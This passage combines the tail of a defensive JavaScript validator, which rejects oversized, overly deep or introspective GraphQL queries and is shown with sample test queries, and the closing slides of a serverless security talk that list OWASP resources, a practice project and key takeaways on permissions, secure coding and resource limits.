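  if (bytes > limits.maxQueryBytes) return `query too large: ${bytes} bytes`;
  const depth = selectionDepth(query);
  if (depth > limits.maxDepth) return `query too deep: ${depth} > ${limits.maxDepth}`;
  if (!limits.allowIntrospection && /\b__(schema|type)\b/.test(query)) {
    return 'introspection is disabled';
  }
  return null;
}

// Constructed sample queries: a normal one, a deeply nested one, an
// introspection query, and one that hides braces inside a string and a comment.
const SHALLOW = '{ user(id: 1) { name __typename } }';
const DEEP = '{ user { friends { friends { friends { friends { friends { name } } } } } } }';
const INTROSPECT = '{ __schema { types { name } } }';
const TRICKY = '{ user(name: "{{{{{{{{") { name } } # {{{{\n';
```

Wire `checkQuery` in front of the executor (for example as an Express middleware on the GraphQL route) and reject with HTTP 400 when it returns a reason.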
36. Hack It Yourself!
https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service

37. Things to consider
• OWASP Top 10
• Serverless Top 10
• SAST and SCA tools
• Threat modeling

38. Key Takeaways
• Serverless security is still an application security problem
• Roles and permissions should be well thought out
• Secure coding practices need to be followed
• Resource limits are highly recommended

39. Thank You
@sharathkramadas